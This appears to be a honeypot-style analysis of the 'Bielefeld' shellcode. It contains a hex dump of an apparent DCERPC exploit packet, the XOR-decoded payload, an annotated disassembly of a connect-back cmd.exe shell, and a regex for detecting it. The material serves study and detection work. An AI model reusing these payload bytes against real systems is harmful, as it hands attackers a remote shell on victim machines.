Bielefeld Shellcode
Shellcode
raw
/*
00000000 05 00 00 03 10 00 00 00 a8 06 00 00 e5 00 00 00 |................|
00000010 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 |................|
00000020 00 00 00 00 32 24 58 fd cc 45 64 49 b0 70 dd ae |....2$X..EdI.p..|
00000030 74 2c 96 d2 60 5e 0d 00 01 00 00 00 00 00 00 00 |t,..`^..........|
00000040 70 5e 0d 00 02 00 00 00 7c 5e 0d 00 00 00 00 00 |p^......|^......|
00000050 10 00 00 00 80 96 f1 f1 2a 4d ce 11 a6 6a 00 20 |........*M...j. |
00000060 af 6e 72 f4 0c 00 00 00 4d 41 52 42 01 00 00 00 |.nr.....MARB....|
00000070 00 00 00 00 0d f0 ad ba 00 00 00 00 a8 f4 0b 00 |................|
00000080 20 06 00 00 20 06 00 00 4d 45 4f 57 04 00 00 00 | ... ...MEOW....|
00000090 a2 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
000000a0 38 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |8..............F|
000000b0 00 00 00 00 f0 05 00 00 e8 05 00 00 00 00 00 00 |................|
000000c0 01 10 08 00 cc cc cc cc c8 00 00 00 4d 45 4f 57 |............MEOW|
000000d0 e8 05 00 00 d8 00 00 00 00 00 00 00 02 00 00 00 |................|
000000e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000f0 00 00 00 00 c4 28 cd 00 64 29 cd 00 00 00 00 00 |.....(..d)......|
00000100 07 00 00 00 b9 01 00 00 00 00 00 00 c0 00 00 00 |................|
00000110 00 00 00 46 ab 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000120 00 00 00 46 a5 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000130 00 00 00 46 a6 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000140 00 00 00 46 a4 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000150 00 00 00 46 ad 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000160 00 00 00 46 aa 01 00 00 00 00 00 00 c0 00 00 00 |...F............|
00000170 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 |...F....`...X...|
00000180 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 |....@... ...8...|
00000190 30 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc |0...............|
000001a0 50 00 00 00 4f b6 88 20 ff ff ff ff 00 00 00 00 |P...O.. ........|
000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000001f0 00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc |................|
00000200 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 |H.....f.........|
00000210 c0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 |.......F........|
00000220 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0c 00 |............x...|
00000230 58 00 00 00 05 00 06 00 01 00 00 00 70 d8 98 93 |X...........p...|
00000240 98 4f d2 11 a9 3d be 57 b2 00 00 00 32 00 31 00 |.O...=.W....2.1.|
00000250 01 10 08 00 cc cc cc cc 80 00 00 00 0d f0 ad ba |................|
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000270 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 |.C......`...`...|
00000280 4d 45 4f 57 04 00 00 00 c0 01 00 00 00 00 00 00 |MEOW............|
00000290 c0 00 00 00 00 00 00 46 3b 03 00 00 00 00 00 00 |.......F;.......|
000002a0 c0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 |.......F....0...|
000002b0 01 00 01 00 81 c5 17 03 80 0e e9 4a 99 99 f1 8a |...........J....|
000002c0 50 6f 7a 85 02 00 00 00 00 00 00 00 00 00 00 00 |Poz.............|
000002d0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 |................|
000002e0 01 10 08 00 cc cc cc cc 30 00 00 00 78 00 6e 00 |........0...x.n.|
000002f0 00 00 00 00 d8 da 0d 00 00 00 00 00 00 00 00 00 |................|
00000300 20 2f 0c 00 00 00 00 00 00 00 00 00 03 00 00 00 | /..............|
00000310 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 |........F.X.....|
00000320 01 10 08 00 cc cc cc cc 10 00 00 00 30 00 2e 00 |............0...|
00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000340 01 10 08 00 cc cc cc cc 68 00 00 00 0e 00 ff ff |........h.......|
00000350 68 8b 0b 00 02 00 00 00 00 00 00 00 00 00 00 00 |h...............|
00000360 86 01 00 00 00 00 00 00 86 01 00 00 5c 00 5c 00 |............\.\.|
00000370 46 00 58 00 4e 00 42 00 46 00 58 00 46 00 58 00 |F.X.N.B.F.X.F.X.|
00000380 4e 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 |N.B.F.X.F.X.F.X.|
00000390 46 00 58 00 9d 13 00 01 cc e0 fd 7f cc e0 fd 7f |F.X.............|
000003a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000004c0 90 90 90 90 90 90 eb 10 5a 4a 33 c9 66 b9 76 01 |........ZJ3.f.v.|
000004d0 80 34 0a 99 e2 fa eb 05 e8 eb ff ff ff 70 61 99 |.4...........pa.|
000004e0 99 99 c3 21 95 69 64 e6 12 99 12 e9 85 34 12 d9 |...!.id......4..|
000004f0 91 12 41 12 ea a5 9a 6a 12 ef e1 9a 6a 12 e7 b9 |..A....j....j...|
00000500 9a 62 12 d7 8d aa 74 cf ce c8 12 a6 9a 62 12 6b |.b....t......b.k|
00000510 f3 97 c0 6a 3f ed 91 c0 c6 1a 5e 9d dc 7b 70 c0 |...j?.....^..{p.|
00000520 c6 c7 12 54 12 df bd 9a 5a 48 78 9a 58 aa 50 ff |...T....ZHx.X.P.|
00000530 12 91 12 df 85 9a 5a 58 78 9b 9a 58 12 99 9a 5a |......ZXx..X...Z|
00000540 12 63 12 6e 1a 5f 97 12 49 f3 9a c0 71 ed 99 99 |.c.n._..I...q...|
00000550 99 1a 5f 94 cb cf 66 ce 65 c3 12 41 f3 9a c0 71 |.._...f.e..A...q|
00000560 f8 99 99 99 1a 75 dd 12 6d f3 89 c0 10 9d 17 7b |.....u..m......{|
00000570 62 c9 c9 c9 c9 f3 98 f3 9b 66 ce 6d 12 41 10 c7 |b........f.m.A..|
00000580 a1 10 c7 a5 10 c7 d9 ff 5e df b5 98 98 14 de 89 |........^.......|
00000590 c9 cf aa 59 c9 c9 c9 f3 98 c9 c9 14 ce a5 5e 9b |...Y..........^.|
000005a0 fa f4 fd 99 cb c9 66 ce 71 5e 9e 9b 99 9b 5a 5e |......f.q^....Z^|
000005b0 de 9d 93 9b 98 04 f3 89 ce ca 66 ce 61 ca 66 ce |..........f.a.f.|
000005c0 65 c9 66 ce 75 aa 59 35 1c 59 ec 60 c8 cb cf ca |e.f.u.Y5.Y.`....|
000005d0 66 4b c3 c0 32 7b 77 aa 59 5a 71 9a 66 66 66 de |fK..2{w.YZq.fff.|
000005e0 fc ed c9 eb f6 fa d8 fd fd eb fc ea ea 99 da eb |................|
000005f0 fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 dc e1 f0 |................|
00000600 ed cd f1 eb fc f8 fd 99 d5 f6 f8 fd d5 f0 fb eb |................|
00000610 f8 eb e0 d8 99 ee ea ab c6 aa ab 99 ce ca d8 ca |................|
00000620 f6 fa f2 fc ed d8 99 fa f6 f7 f7 fc fa ed 99 fa |................|
00000630 f5 f6 ea fc ea f6 fa f2 fc ed 99 00 5c 00 43 00 |............\.C.|
00000640 24 00 5c 00 31 00 32 00 33 00 34 00 35 00 36 00 |$.\.1.2.3.4.5.6.|
00000650 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 |1.1.1.1.1.1.1.1.|
00000660 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2e 00 |1.1.1.1.1.1.1...|
00000670 64 00 6f 00 63 00 00 00 01 10 08 00 cc cc cc cc |d.o.c...........|
00000680 20 00 00 00 30 00 2d 00 00 00 00 00 88 2a 0c 00 | ...0.-......*..|
00000690 02 00 00 00 01 00 00 00 28 8c 0c 00 01 00 00 00 |........(.......|
000006a0 07 00 00 00 00 00 00 00 |........|
000006a8
*/
unxor'd
00000000: 05 00 00 03 10 00 00 00 - a8 06 00 00 e5 00 00 00 ........ ........
00000010: 90 06 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00 ........ ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00 t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00 p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20 ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00 .nr..... MARB....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00 ........ ........
00000080: 20 06 00 00 20 06 00 00 - 4d 45 4f 57 04 00 00 00 ........ MEOW....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 8....... .......F
000000b0: 00 00 00 00 f0 05 00 00 - e8 05 00 00 00 00 00 00 ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57 ........ ....MEOW
000000d0: e8 05 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00 ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00 ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00 ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00 ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 38 03 00 00 ........ ....8...
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc 0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00 P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00 H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00 .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00 ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93 X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00 .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00 .C...... ........
00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00 MEOW.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00 .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00 .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00 Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00 ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00 ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00 ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00 ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00 ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00 ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00 h....... ........
00000360: 86 01 00 00 00 00 00 00 - 86 01 00 00 5c 00 5c 00 ........ ........
00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00 F.X.N.B. F.X.F.X.
00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00 N.B.F.X. F.X.F.X.
00000390: 46 00 58 00 9d 13 00 01 - cc e0 fd 7f cc e0 fd 7f F.X..... ........
000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000450: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000460: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000470: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000480: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000490: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004c0: 90 90 90 90 90 90 eb 10 - 5a 4a 33 c9 66 b9 76 01 ........ ZJ3.f.v.
000004d0: 80 34 0a 99 e2 fa eb 05 - e8 eb ff ff ff e9 f8 00 .4...... ........
000004e0: 00 00 5a b8 0c f0 fd 7f - 8b 00 8b 70 1c ad 8b 40 ..Z..... ...p....
000004f0: 08 8b d8 8b 73 3c 03 f3 - 8b 76 78 03 f3 8b 7e 20 ....s... .vx.....
00000500: 03 fb 8b 4e 14 33 ed 56 - 57 51 8b 3f 03 fb 8b f2 ...N.3.V WQ......
00000510: 6a 0e 59 f3 a6 74 08 59 - 5f 83 c7 04 45 e2 e9 59 j.Y..t.Y ....E..Y
00000520: 5f 5e 8b cd 8b 46 24 03 - c3 d1 e1 03 c1 33 c9 66 .....F.. .....3.f
00000530: 8b 08 8b 46 1c 03 c3 c1 - e1 02 03 c1 8b 00 03 c3 ...F.... ........
00000540: 8b fa 8b f7 83 c6 0e 8b - d0 6a 03 59 e8 74 00 00 ........ .j.Y.t..
00000550: 00 83 c6 0d 52 56 ff 57 - fc 5a 8b d8 6a 03 59 e8 ....RV.W .Z..j.Y.
00000560: 61 00 00 00 83 ec 44 8b - f4 6a 10 59 89 04 8e e2 a.....D. .j.Y....
00000570: fb 50 50 50 50 6a 01 6a - 02 ff 57 f4 8b d8 89 5e .PPPPj.j ..W.....
00000580: 38 89 5e 3c 89 5e 40 66 - c7 46 2c 01 01 8d 47 10 8......f .F....G.
00000590: 50 56 33 c0 50 50 50 6a - 01 50 50 8d 57 3c c7 02 PV3.PPPj .PP.W...
000005a0: 63 6d 64 00 52 50 ff 57 - e8 c7 07 02 00 02 c3 c7 cmd.RP.W ........
000005b0: 47 04 0a 02 01 9d 6a 10 - 57 53 ff 57 f8 53 ff 57 G.....j. WS.W.S.W
000005c0: fc 50 ff 57 ec 33 c0 ac - 85 c0 75 f9 51 52 56 53 .P.W.3.. ..u.QRVS
000005d0: ff d2 5a 59 ab e2 ee 33 - c0 c3 e8 03 ff ff ff 47 ..ZY...3 .......G
000005e0: 65 74 50 72 6f 63 41 64 - 64 72 65 73 73 00 43 72 etProcAd dress.Cr
000005f0: 65 61 74 65 50 72 6f 63 - 65 73 73 41 00 45 78 69 eateProc essA.Exi
00000600: 74 54 68 72 65 61 64 00 - 4c 6f 61 64 4c 69 62 72 tThread. LoadLibr
00000610: 61 72 79 41 00 77 73 32 - 5f 33 32 00 57 53 41 53 aryA.ws2 .32.WSAS
00000620: 6f 63 6b 65 74 41 00 63 - 6f 6e 6e 65 63 74 00 63 ocketA.c onnect.c
00000630: 6c 6f 73 65 73 6f 63 6b - 65 74 00 00 5c 00 43 00 losesock et....C.
00000640: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00 ....1.2. 3.4.5.6.
00000650: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00 1.1.1.1. 1.1.1.1.
00000660: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00 1.1.1.1. 1.1.1...
00000670: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc d.o.c... ........
00000680: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00 ....0... ........
00000690: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00 ........ ........
000006a0: 07 00 00 00 00 00 00 00 - 00 ........ .
Analysis
xor decoder
00402006 eb 10 jmp short bielefel.00402018 ; }
00402008 5a pop edx ; }
00402009 4a dec edx ; }
0040200a 33c9 xor ecx,ecx ; }
0040200c 66:b9 7601 mov cx,176 ; } decoder
00402010 80340a 99 xor byte ptr ds:[edx+ecx],99 ; }
00402014 ^e2 fa loopd short bielefel.00402010 ; }
00402016 eb 05 jmp short bielefel.0040201d ; }
00402018 e8 ebffffff call bielefel.00402008 ; }
; ==========================================================================
unxor'd shellcode
0040201d e9 f8000000 jmp bielefel.0040211a
00402022 5a pop edx ; start, find getprocaddress
00402023 b8 0cf0fd7f mov eax,7ffdf00c
00402028 8b00 mov eax,dword ptr ds:[eax]
0040202a 8b70 1c mov esi,dword ptr ds:[eax+1c]
0040202d ad lods dword ptr ds:[esi]
0040202e 8b40 08 mov eax,dword ptr ds:[eax+8]
00402031 8bd8 mov ebx,eax
00402033 8b73 3c mov esi,dword ptr ds:[ebx+3c]
00402036 03f3 add esi,ebx
00402038 8b76 78 mov esi,dword ptr ds:[esi+78]
0040203b 03f3 add esi,ebx
0040203d 8b7e 20 mov edi,dword ptr ds:[esi+20]
00402040 03fb add edi,ebx
00402042 8b4e 14 mov ecx,dword ptr ds:[esi+14]
00402045 33ed xor ebp,ebp
00402047 56 push esi
00402048 57 push edi
00402049 51 push ecx
0040204a 8b3f mov edi,dword ptr ds:[edi]
0040204c 03fb add edi,ebx
0040204e 8bf2 mov esi,edx
00402050 6a 0e push 0e
00402052 59 pop ecx
00402053 f3:a6 repe cmps byte ptr es:[edi],byte ptr ds:[esi]
00402055 74 08 je short bielefel.0040205f
00402057 59 pop ecx
00402058 5f pop edi
00402059 83c7 04 add edi,4
0040205c 45 inc ebp
0040205d ^e2 e9 loopd short bielefel.00402048
0040205f 59 pop ecx ; getprocaddress entry found
00402060 5f pop edi
00402061 5e pop esi
00402062 8bcd mov ecx,ebp
00402064 8b46 24 mov eax,dword ptr ds:[esi+24]
00402067 03c3 add eax,ebx
00402069 d1e1 shl ecx,1
0040206b 03c1 add eax,ecx
0040206d 33c9 xor ecx,ecx
0040206f 66:8b08 mov cx,word ptr ds:[eax]
00402072 8b46 1c mov eax,dword ptr ds:[esi+1c]
00402075 03c3 add eax,ebx
00402077 c1e1 02 shl ecx,2
0040207a 03c1 add eax,ecx
0040207c 8b00 mov eax,dword ptr ds:[eax]
0040207e 03c3 add eax,ebx
00402080 8bfa mov edi,edx
00402082 8bf7 mov esi,edi
00402084 83c6 0e add esi,0e
00402087 8bd0 mov edx,eax ; eax == getprocaddress
00402089 6a 03 push 3
0040208b 59 pop ecx
0040208c e8 74000000 call bielefel.00402105 ; find addr for {createprocessa, exitthread, loadlibarya}, saved at edi
00402091 83c6 0d add esi,0d
00402094 52 push edx
00402095 56 push esi
00402096 ff57 fc call dword ptr ds:[edi-4] ; loadlibrarya("ws2_32.dll")
00402099 5a pop edx
0040209a 8bd8 mov ebx,eax
0040209c 6a 03 push 3
0040209e 59 pop ecx
0040209f e8 61000000 call bielefel.00402105 ; find addr for {wsasocketa, connect, closesocket}
004020a4 83ec 44 sub esp,44 ; lpstartupinfo buffer
004020a7 8bf4 mov esi,esp
004020a9 6a 10 push 10
004020ab 59 pop ecx
004020ac 89048e mov dword ptr ds:[esi+ecx*4],eax ; init buffer with 0
004020af ^e2 fb loopd short bielefel.004020ac
004020b1 50 push eax
004020b2 50 push eax
004020b3 50 push eax
004020b4 50 push eax
004020b5 6a 01 push 1
004020b7 6a 02 push 2
004020b9 ff57 f4 call dword ptr ds:[edi-c] ; wsasocketa()
004020bc 8bd8 mov ebx,eax
004020be 895e 38 mov dword ptr ds:[esi+38],ebx ; }
004020c1 895e 3c mov dword ptr ds:[esi+3c],ebx ; } lpstartupinfo: stdin/stdout/stderr -> use socket
004020c4 895e 40 mov dword ptr ds:[esi+40],ebx ; }
004020c7 66:c746 2c 0101 mov word ptr ds:[esi+2c],101 ; lpstartupinfo: flags -> 100000001
004020cd 8d47 10 lea eax,dword ptr ds:[edi+10]
004020d0 50 push eax ; lpprocessinformation -> after shellcode
004020d1 56 push esi ; lpstartupinfo -> stack
004020d2 33c0 xor eax,eax
004020d4 50 push eax ; lpcurrentdirectory == 0
004020d5 50 push eax ; lpenvironment == 0
004020d6 50 push eax ; dwcreationflags == 0
004020d7 6a 01 push 1 ; binherithandles == 1
004020d9 50 push eax ; lpthreadattributes == 0
004020da 50 push eax ; lpprocessattributes == 0
004020db 8d57 3c lea edx,dword ptr ds:[edi+3c]
004020de c702 636d6400 mov dword ptr ds:[edx],646d63
004020e4 52 push edx ; lpcommandline == "cmd"
004020e5 50 push eax ; lpapplicationname == 0
004020e6 ff57 e8 call dword ptr ds:[edi-18] ; createprocessa()
004020e9 c707 020002c3 mov dword ptr ds:[edi],c3020002 ; port,sin_familiy
004020ef c747 04 0a02019d mov dword ptr ds:[edi+4],9d01020a ; ip
004020f6 6a 10 push 10
004020f8 57 push edi ; in_addr
004020f9 53 push ebx
004020fa ff57 f8 call dword ptr ds:[edi-8] ; connect()
004020fd 53 push ebx
004020fe ff57 fc call dword ptr ds:[edi-4] ; closesocket()
00402101 50 push eax
00402102 ff57 ec call dword ptr ds:[edi-14] ; exitthread()
; ==========================================================================
; lookup kernel fns, use strings stored in esi and write function addresses to edi
00402105 33c0 xor eax,eax
00402107 ac lods byte ptr ds:[esi]
00402108 85c0 test eax,eax
0040210a ^75 f9 jnz short bielefel.00402105
0040210c 51 push ecx
0040210d 52 push edx
0040210e 56 push esi
0040210f 53 push ebx
00402110 ffd2 call edx
00402112 5a pop edx
00402113 59 pop ecx
00402114 ab stos dword ptr es:[edi]
00402115 ^e2 ee loopd short bielefel.00402105
00402117 33c0 xor eax,eax
00402119 c3 retn
; ==========================================================================
0040211a e8 03ffffff call bielefel.00402022
Pattern
const char *pattern =
"\\xc7\\x02\\x63\\x6d\\x64\\x00\\x52\\x50\\xff\\x57\\xe8"
"\\xc7\\x07\\x02\\x00(..)\\xc7\\x47\\x04(....)\\x6a\\x10"
"\\x57\\x53\\xff\\x57\\xf8\\x53\\xff\\x57\\xfc\\x50\\xff"
"\\x57\\xec";
